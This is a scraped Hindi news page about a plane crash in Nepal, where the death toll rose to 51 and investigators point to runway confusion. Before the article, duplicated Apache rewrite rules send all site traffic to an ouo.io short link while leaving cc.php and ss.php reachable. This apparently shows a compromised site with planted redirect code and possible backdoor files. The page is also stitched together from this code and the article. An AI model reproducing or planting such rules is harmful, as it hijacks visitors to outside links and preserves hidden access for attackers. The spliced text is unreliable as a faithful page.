
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 362
Previous Nextनई दिल्ली। नेपाल में हुए विमान हादसे में मृतकों की संख्या बढ़ कर 51 हो गई है। सोमवार को हुए इस विमान हादसे में कई यात्री गंभीर रूप से घायल भी हो गए थे, जिनका फिलहाल अस्पताल में इलाज चल रहा है।
गौरतलब है कि घटना के समय इस विमान में 67 यात्रियों के अलावा चार क्रू मेंबर भी मौजूद थे। दुर्घटना की जांच कर रही टीम को शुरुआती जांच में पता चला है कि यह हादसा रनवे को लेकर पैदा हुई भ्रम की स्थिति की वजह से हुई। कल बांगलादेश की एक विशेष टीम भी जांच में शामिल हुई है। जांच टीम को विमान का ब्लैक बॉक्स मिल गया है। जिसके आधार पर जांच आगे बढ़ रही है। नेपाल की जांच टीम के साथ शामिल हुए बांगलादेश के प्रतिनिधिमंडल में नागरिक विमानन एवं परिवहन मंत्री एकेएम शाहजहां कमाल, विदेश मंत्री अबुल हसन महमूद अली और विमानन के वरिष्ठ अधिकारी शामिल हैं। अधिकारियों ने कहा कि दुर्घटना से ठीक पहले के वायु यातायात नियंत्रकों और पायलटों के बीच बातचीत से यह संकेत मिलता है कि यह घटना रनवे को लेकर भ्रम की वजह से हुई होगी। वहीं एक नेपाली समाचार पत्र की खबर के अनुसार पायलट और एयर ट्रैफिक कंट्रोलर के बीच हुई अंतिम चार मिनट की बातचीत से पता चलता है कि पायलट के मन में रनवे 02 और रनवे 20 को लेकर भ्रम था।